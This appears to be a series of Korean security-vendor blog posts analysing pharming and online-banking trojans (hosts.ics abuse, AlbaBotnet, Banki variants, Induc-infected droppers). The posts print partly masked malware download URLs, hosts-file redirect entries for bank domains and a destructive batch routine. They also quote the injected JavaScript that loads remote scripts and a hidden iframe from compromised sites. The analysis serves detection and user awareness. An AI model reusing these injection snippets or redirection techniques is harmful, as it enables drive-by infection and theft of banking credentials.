인터넷 사용이 일반화 되면서 인터넷뱅킹을 통해 은행을 직접 가지 않더라도 책상 앞에서 손쉽게 온라인 송금이 가능하고, 직접 매장에 가지 않더라도 온라인 쇼핑몰을 통해 손쉽게 물건을 구매할 수 있는 편리한 세상이 되었다. 그러나 이러한 기술 발전의 이면에는 조그만 부주의가 큰 손실을 가져오기도 한다.

 최근 올바른 홈페이지 주소를 입력하여도 가짜 홈페이지로 유도되어 개인의 금융거래 정보를 탈취하는 파밍 사고가 지속적으로 발생하고 있어 이러한 사고의 예방을 위해 파밍 기법에 대해 소개하고자 한다.

 

일반적으로 사용자들의 금융정보를 가로채기 위해 공격자들은 악성코드 감염을 통해 사용자의 hosts 파일을 변경하거나, 공격자가 만들어 놓은 서버 IP를 사용자 DNS 서버 IP로 변경하여 정상적인 금융권 사이트 접속 시 공격자가 만들어 놓은 가짜 사이트로 접속하도록 만든다. 그러나 이와 같은 방법은 이미 일반화 된 공격방법이기 때문에 대부분의 보안프로그램들은 사용자 시스템의 hosts파일을 모니터링 하여 변경사실을 사용자에게 알리거나 변경자체를 방어하기도 한다. 최근 피해사례가 증가하고 있는 파밍 사이트로 접속을 시도하는 피해 시스템들을 확인한 결과, DNS IP의 변경이나 hosts 파일의 변조도 일어나지 않은 상태에서도 공격자가 만들어 놓은 가짜 사이트로 접속을 시도하는 것을 확인할 수 있었다.

 

[그림1] 파밍 사이트 화면

우리가 원하는 웹사이트를 찾아갈 때, 사용자는 웹 브라우저에 해당 웹사이트의 URI정보를 입력하게 되지만, 웹 브라우저가 이 URI정보를 확인하고 해당 웹사이트를 직접 찾아가는 것이 아니라 DNS를 통해 해당 웹 서버의 IP를 확인해서 연결이 되는 것이다. 웹사이트를 찾아갈 때, 참조하는 정보와 우선순위를 살펴보면 아래와 같다.

① 로컬시스템의 DNS Cache 정보

② hosts.ics

③ hosts

④ DNS

 

여기에서 hosts.ics 파일은 일반적으로 사용하지 않는 인터넷 연결 공유(ICS: Internet Connection Sharing) 시 특정한 클라이언트의 IP를 강제로 지정하는 기능을 하는 파일이다. 위 순서와 같이 hosts.ics 파일이 존재하지 않을 경우, hosts 파일을 참조하게 되지만, 악성코드 제작자 입장에서는 각종 보안프로그램들이 주시하고 있는 hosts 파일을 굳이 변경하지 않더라도 우선순위가 높은 hosts.ics 파일을 변경하여 생성하게 되면 원하는 파밍 사이트로 얼마든지 유도가 가능하다는 것이 확인되었다.

 

최초 유포지는 지속적으로 변경되고 있지만, 수집되는 악성파일들을 분석한 결과 변조된 업데이트 파일들이 아래 경로의 악성코드를 다운로드 받아 동작하게 된다는 사실을 확인하였다.

 

☞ hxxp://www.*zs**.**m/e2.exe

 

 

위 악성파일이 다운로드 되면 C:\Windows\Tasks 폴더에 conime.exe 파일을 생성하게 되고, 이 악성코드가 서비스에 자신을 등록 후 외부 서버로부터 파밍에 이용될 사이트 정보를 지속적으로 참조한다.

[그림2] 지속적으로 갱신되는 파밍 사이트


[그림3] 악성코드 주요 기능

이 과정에서 해당 악성코드는 아래 경로에 hosts.ics 파일을 생성하게 되고, 지속적으로 모니터링하며 파밍 사이트를 갱신한다.

[그림4] 파밍 사이트 유도를 위한 hosts.ics 생성

hosts.ics 파일의 우선순위로 인해 악성코드 감염 시 사용자들은 정상적인 금융권 사이트의 주소를 입력하더라도 아래와 같이 악성코드 제작자가 만들어 놓은 파밍 사이트로 접속을 하게 되며, 파밍 사이트는 어떠한 메뉴를 선택을 하더라도 "전자금융 사기예방시스템" 신청을 위한 개인정보 입력화면으로 이동하게 된다.

 

[그림5] 개인정보 입력을 유도하는 파밍 사이트


[그림6] 개인정보 입력을 유도하는 파밍 사이트


개인정보 입력란에 위와 같이 쓰레기(TEST를 위한) 값을 입력할 경우, 입력되는 값들을 검증하여 정해진 형식과 일치하지 않을 경우 [그림7]과 같이 에러 메시지가 발생한다. 이러한 사실로 보아 최근에 발견되는 대부분의 피싱이나 파밍 사이트들은 입력되는 값들을 무조건 수집하는 것이 아니라, 필터링을 통해 의미 있는 데이터들을 수집하고 있다는 것을 확인할 수 있다.

[그림7] 입력되는 값이 형식과 맞지 않을 때의 에러화면

최근에 확인되는 온라인게임핵 이나 파밍 관련 악성코드들은 대부분 PUP(불필요한 프로그램)의 업데이트 파일들의 변조를 통해 유포되거나, 악성 스크립트가 삽입된 취약한 웹사이트 방문 시 감염되는 경우가 많다.

또한 웹사이트, 블로그를 방문 하는 경우에는 ActiveX와 P2P 프로그램의 설치를 더욱 세심히 살펴보고 설치 여부를 결정해야 한다.

[제어판]-[프로그램 추가/제거] 기능을 이용하여 PUP(불필요한 프로그램)은 사전에 제거하는 것이 바람직하다.

 

<V3 제품군의 진단명>

Trojan/Win32.Qhost


신고
Posted by DH, L@@

 국내에서 온라인 뱅킹 사용자를 타깃으로 한 악성코드가 발견된 것은 오래 전 일이지만, 최근들어 폭발적인 증가를 보여주고 있었다. 해외에서도 오래 전부터 피싱이나 파밍과 같은 온라인 사기 수법이나 인터넷 뱅킹 관련 정보 수집을 목적으로 악성코드를 이용한 공격에 의한 피해가 지속적으로 발생하고 있었다.

 

 해외 기사에서 보고된 AlbaBotnet은 인터넷 뱅킹 정보를 탈취하기 위한 목적으로 제작된 악성코드의 좋은 예이다. 이 봇넷은 칠레 은행의 온라인뱅킹을 이용하는 사용자를 타깃으로 제작된 악성코드로 이메일 등 다양한 경로를 통해 유포된 것으로 보고 있다.

 

이 봇넷의 한 변형을 분석한 결과 다음과 같은 감염행위가 이루어지는 것을 확인할 수 있었다.

 

  • system32폴더에 wincal.exe 이름으로 자신을 복사한 후 실행
  • 레지스트리에 아래의 데이터를 추가하여 부팅 시 실행

    HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load

    "C:\WINDOWS\system\wincal.exe"

  • hosts 파일을 변조하기 위한 정보가 있는 111.**.***.208 IP에 접속
  • 서버에서 받아온 정보를 참조하여 Hosts 파일을 변조
  • 웹 브라우저로 은행 사이트 접속 시 위장된 피싱 사이트로 이동

 

변조되는 host파일에 등록된 은행 사이트들의 목록은 아래와 같고 공격자가 타깃으로 하는 사이트들이 칠레의 금융기관인 것을 알 수 있다.

 

111.***.159.2* www.santander.cl

111.***.159.2* santander.cl

111.***.159.2* www.bci.cl

111.***.159.2* bci.cl

 

감염된 악성코드는 hosts 파일의 변경이 이루어졌는지 주기적으로 접속을 하고 감염된 사용자가 hosts파일에 등록된 웹사이트에 접속 시 피싱 사이트로 접속하여 사용자의 금융 관련 정보를 가져오기 위한 시도를 한다.

 

[그림 1] 피싱 사이트 접속 정보

 

남미에서는 이러한 유형의 인터넷 뱅킹 관련 악성코드들을 지속적으로 유포하는 봇넷이 다수 등장하고 있는 것으로 보인다. KAV의 보고서에 의하면 PiceBOT, S.A.P.Z (Sistema de Administración de PCs Zombi - Zombie PCs Administration System) 등 비슷한 유형의 악성코드들이 지속적으로 유포되고 있고 피해 또한 증가하고 있다고 한다. 이러한 봇넷 샘플들 또한 Albabotnet 관련 악성코드와 비슷하게 hosts 파일을 변조시키는 방식으로 악성 사이트로 사용자를 유도하는 것으로 보인다.

 

이와 같은 남미 국가들의 인터넷 뱅킹 악성코드의 급격한 증가 상황은 국내와 유사하고 악성코드의 동작 방식 또한 유사한 면이 많다. 최근 국내에서 유행하는 악성코드들이 대부분 hosts 파일을 변조하여 사용자를 피싱사이드로 유도하는 식으로 개인 정보를 노리고 있다. 비슷한 악성코드의 변형들을 지속적으로 유포하여 다수의 사용자를 감염시키고 웹 사이트에서 hosts파일의 정보를 받아 업데이트를 해줌으로써 사용자를 계속 피해에 노출될 수 있는 환경으로 유지시킨다.

 

이러한 악성코드로부터 고객의 정보를 보호하고 정보 유출로 인한 피해를 예방하기 위해서는 기업들도 다양한 방식으로 보안 강화를 위한 노력을 해야 하고 PC 사용자 또한 백신프로그램 및 OTP 사용 등 개인정보를 안전한 상태로 유지하기 위한 노력을 지속해야 할 것이다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.


Trojan/Win32.Xema

신고
Posted by DH, L@@

 국내 온라인 뱅킹 사용자를 타깃으로 보안카드 등의 금융 정보를 노리는 악성코드(Banki) 변종이 지속적으로 발견되는 가운데, 최근 이름과 주민번호를 체크하는 루틴까지 추가된 변종이 발견되면서 그 수법이 점차 고도화되고 있어 사용자의 주의가 필요로 하다.

 '파밍' 이라고도 부르는 해당 악성코드는 가짜 뱅킹 사이트로 연결되도록 조작해 금융정보를 빼내는 신종 사기 수법으로, 최근 거액의 사기사건이 보고되면서 사회적인 이슈가 되고 있다.

보통 악성 스크립트가 삽입된 취약한 웹사이트를 통해 감염되며, 감염 시 hosts 파일을 변경하여 악성코드 제작자가 만든 가짜 뱅킹 사이트로 접속됨으로써 사용자의 금융정보를 입력 하도록 유도하고 있다.

 

이번에 발견된 변종이 유포되는 유포지 와 [9090.exe] 다운로더 에 의해 생성되는 파일은 아래와 같다.

 

[Download URL]

http://125.***.***.5/9090.exe (Downloder)

http://sk*******3.g****.net/asd.txt (다운로드되는 파일 목록)

http://125.***.***.4:8080/26.exe (hosts 파일 변조)

http://125.***.***.5/8888.exe (021F0552\svchsot.exe 생성)

http://125.***.***.5/23.exe (hosts 파일 변조)

 

다운로드 된 [26.exe], [23.exe] 악성파일에 의해 hosts파일이 아래와 같이 변조된 것을 확인할 수 있는데, 변조된 hosts파일에 의해서 정상적인 뱅킹 사이트에 접속하여도 가짜 사이트로 리다이렉트(redirect)시켜 사용자도 모르게 피싱사이트에 접속되어 피해를 입을 수 있는 것이다.

 

[그림 1] 악성 파일에 의해 변조된 hosts 파일

감염된 PC에서 뱅킹 사이트에 접속한 모습이다.

정상적인 방법으로 뱅킹 사이트를 방문하였지만 피싱 사이트로 리다이렉트 되었으며, 하나같이 보안관련 인증절차를 요구하며, 사용자로 하여금 금융정보를 입력하게끔 유도하고 있다.

 

[그림 2] 가짜 뱅킹 사이트

 

기존의 Banki 악성코드와 마찬가지로, 사용자의 이름, 주민번호, 보안카드 정보 등을 요구하고 있다. 기존에는 임의의 문자와 랜덤 한 숫자로 주민번호를 입력하면 다음 단계로 넘어갔었는데, 이번 변종에서는 사용자의 이름과 주민번호가 정상적으로 입력되었는지 체크하는 루틴이 추가되었다는 것이다.

    

[그림 3] 이름과 주민번호를 체크하는 소스부분

 

또한, 다운로드 된 다른 [8888.exe] 파일은 아래와 같은 경로에 [svchost.exe]을 생성하며 자기 자신을 자동 실행되게끔 tasks(예약작업)에 등록한다.

 

8888.exe CREATE C:\WINDOWS\021F0552\svchsot.exe (Tasks 작업 생성파일)    

svchost.exe CREATE C:\WINDOWS\Tasks\At1.job    

svchost.exe CREATE C:\WINDOWS\Tasks\At2.job    

svchost.exe CREATE C:\WINDOWS\Tasks\At3.job

 

 

[그림 4] 악성코드에 의해 생성된 예약작업들

 

이러한 파밍에 대한 피해를 막기 위해서는, 무리한 개인정보를 요구할 경우 의심을 해야 하며, 무엇보다 보안카드 번호 전체를 요구한다면 100% 파밍이라고 볼 수 있다.

최신 엔진의 백신으로 시스템을 주기적으로 정밀검사 함으로써 금전적인 피해를 예방해야 한다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

 

 

 

신고
Posted by DH, L@@

 지난 12월 국내 인터넷 뱅킹 사용자가 타켓인 악성코드(Banki)에서 특정 시스템 날짜가 되면 윈도우 시스템 파일을 삭제하는 기능이 발견되었다.

과거에 발견된 Banki정보는 아래 페이지에서 확인이 가능하다.

 

http://asec.ahnlab.com/search/banki

 

이번에 발견된 Banki 변종은 Induc 바이러스에 감염된 악성코드이며, http://210.***.**.32:2323/qq.exe 를 통하여 유포 되는 것으로 확인되었다.

(온라인 뱅킹 트로이목마 Banki(1) 에서 유포과정을 다루었다.)

 

위 파일이 실행되어 악성코드에 감염될 경우 아래와 같은 경로에 파일이 생성된다.

C:\Windows\system32\muis\tempblogs.\tempblogs..\

'1216', 'Winlogones.exe', 'csrsses.exe'

 

[그림1] 악성코드에 의하여 생성된 파일

 

 

감염 후 아래와 같이 레지스트리에 서비스로 등록되어, 부팅시 실행된다.

 

 

[그림2] 서비스 등록

실행된 환경에 따라 다르게 나타날 수 있지만, 악성 프로세스 'winlogones.exe'는 정상 프로세스인 'winlogon.exe' 에 자신을 인젝션하여 프로세스 목록에 'winlogones.exe' 가 보이지 않게 한다. 동시에 또 다른 악성 프로세스인 'csrsses.exe' 도 계산기 프로세스 이름인 'calc.exe' 에 자신을 인젝션하여 실행한다.

 

[그림3] 정상적인 프로세스만 동작하는 것으로 위장

 

또한, 악성코드는 'winlogones.exe' 가 존재하지 않을 경우, www.mi****.com/temp/q/m.mp3 로 접속하여 다시 다운로드 받게 되어 있다.

이후 프로세스 목록을 확인하여 'V3LSvc.exe', 'AYRTSrv.aye', 'Nsavsvc.npc' 가 없을 경우 아래의 파일을 추가로 다운받는다.

 

다운로드 주소

생성된 파일명

www.zhu*****.com/temp/q/1.mp3

ChilkatCert.dll

www.zhu*****.com/temp/q/q.mp3

qserver.exe

www.zhu*****.com/temp/q/2.mp3

iexplores.exe

www.zhu*****.com/temp/q/3930.mp3

termsrv.dll

www.zhu*****.com:2323/count.txt

count.txt

[표1] 다운로드 파일

 

다운로드 받은 파일은 아래의 경로에 생성된다.

C:\Windows\system32\muis\tempblogs.\tempblogs..\

 

이번 변종에서 발견된 가장 큰 특징은 특정 날짜(2013년 1월 16일)가 되면 시스템 파괴 기능이 동작하도록 제작 되었다.

 

해당 날짜가 되면 아래와 같은 배치 파일을 c:\ 에 생성하며 실행된다.

 

[그림4] 시스템 파괴 기능이 포함된 배치 파일

 

배치 파일에 의하여 ALG(Application Layer Gate) 서비스를 중지하고

hal.dll 파일과 System32 내의 파일을 삭제하게 된다.

 

배치 파일이 실행되면 아래와 같은 메시지가 발생한다.

 

[그림5] 시스템 파괴 기능 동작

 

 

만약, 시스템을 재부팅하게 되면, 아래와 같은 메시지가 나타나며, 정상적인 부팅이 불가능하다.

 

[그림6] 시스템 파괴 후 리부팅시 화면

 

 

 

해당 악성코드는 V3 제품을 통하여 진단 및 치료가 가능했기 때문에, 실제 피해 보고는 접하기 어려웠다.

 

<V3 제품군의 진단명>

Trojan/Win32.Banki

신고
Posted by DH, L@@

 Boland사에서 개발한 프로그래밍 언어인 Delphi에는 일부 버전(Delphi4 ~ 7)에서 사용하는 Sysconst 라이브러리가 있다. Win32/Induc 바이러스는 이 라이브러리를 감염 시킨 후 컴파일 과정에서 생성되는 EXE, DLL 등에 바이러스 코드를 삽입하는 기법의 바이러스이다.

 

Win32/Induc은 2009년 8월경 발견되었으며 그 당시 국내에서 제작 및 배포되고 있는 Delphi 기반의 프로그램들도 해당 바이러스에 감염된 사례가 다수 있었으나 불행 중 다행인 것은 위에서 언급한 것처럼 Win32/Induc은 Delphi소스에 자신의 코드를 삽입하는 기능만 있을 뿐 감염된 소스가 컴파일 되어 생성된 EXE, DLL을 일반 PC에서 실행시켜도 아무런 피해를 발생시키지 않는다. 만약 Win32/Induc이 Win32/Virut이과 동일한 기능(파일감염, IRC채널 접속, 보안 사이트 접속방해 등)을 가지고 있었다면 다수의 일반 PC들에서 피해가 발생했을 것이다.

 

* Win32/Induc 바이러스 조치 가이드:

http://www.ahnlab.com/kr/site/securitycenter/asec/asecIssueView.do?webAsecIssueVo.seq=57

 

2012년 12월 말 경, Delphi로 제작된 Win32/Induc에 감염된 온라인 뱅킹 트로이목마가 해킹된 국내 웹하드 사이트를 통해서 유포된 사례가 발견되었다.

 

• 웹하드 사이트: http://www.****hard.co.kr/common/JS/action2.js

 

action2.js파일의 내부에는 아래와 같이 자바 스크립트 코드가 삽입되어 있었고 국내 UCC 동영상 관련 사이트로부터 cp.js파일을 다운로드하도록 되어있다.

if(document.cookie.indexOf('ggads')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='ggads=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://ucc.******.co.kr/adsi/cp.js></script>"));}

 

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/cp.js

cp.js파일에 저장된 코드는 아래와 같으며 특정 게임 사이트에서 또 다른 악성 스크립트를 다운로드하도록 되어있다.

document.write("<iframe src=http://flash.*****.pe.kr/adsi/adsi.htmlwidth=0 height=0></iframe>");

 

adsi.html 역시 동일한 사이트에서 index.html파일을 다운로드 하는데 해당 스크립트는 아래 그림처럼 Gongda Pack으로 난독화된 악성 스크립트이다.

 

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/index.html

 

 

[그림 1] Gongda Pack으로 난독화된 index.html

 

위 [그림 1]에서처럼 index.html은 Gongda Pack 툴킷으로 난독화되어 있음을 알 수 있으며 국내 해킹된 사이트를 통해서 유포된 악성 스크립트의 대부분이 해당 툴킷을 통해서 난독화되어 있다. (참고로 index.html이 Gongda Pack으로 난독화되어 있음을 알 수 있는 부분은 바로 아래 부분이다.)

 

/*Encrypt By 210.***.53.***:2323's JSXX 0.44 VIP*/

 

난독화된 index.html파일을 풀어보면 아래처럼 우리가 흔히 사용하는 JAVA와 Internet Explorer에 존재하는 취약점을 이용하여 실행파일을 다운로드함을 알 수 있다.

 

[그림 2] 난독화 해제된 index.html

 

[그림 2]에서 보는 것처럼 qq.exe를 다운로드 및 실행하기 위해서 사용한 취약점은 아래 JAVA 5개, Internet Explorer 1개 등 총 6개를 사용한다.

 

Java : CVE-2010-0886, CVE-2011-3544, CVE-2012-0507, CVE-2012-4681, CVE-2012-5076

IE : CVE-2012-1889

 

위 취약점이 존재할 경우, 다운로드 되는 qq.exe의 내부 코드를 살펴보면 Delphi로 제작되었고 아

래 그림처럼 Win32/Induc 바이러스 코드가 존재함을 확인할 수 있다.

 

00003604 00403604 0 SOFTWARE\Borland\Delphi\RTL

00005568 00405568 0 Software\Borland\Locales

00005584 00405584 0 Software\Borland\Delphi\Locales

 

[그림 3] Win32/Induc 바이러스 코드가 포함된 qq.exe

 

qq.exe에 의해서 다운로드되는 2.mp3파일도 마찬가지로 아래 그림처럼 Win32/Induc 바이러스가 존재했다.

[그림 4] qq.exe에 의해서 다운로드되는 2.mp3

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

Win-Trojan/Prosti.132540

Trojan/Win32.Banki

신고
Posted by DH, L@@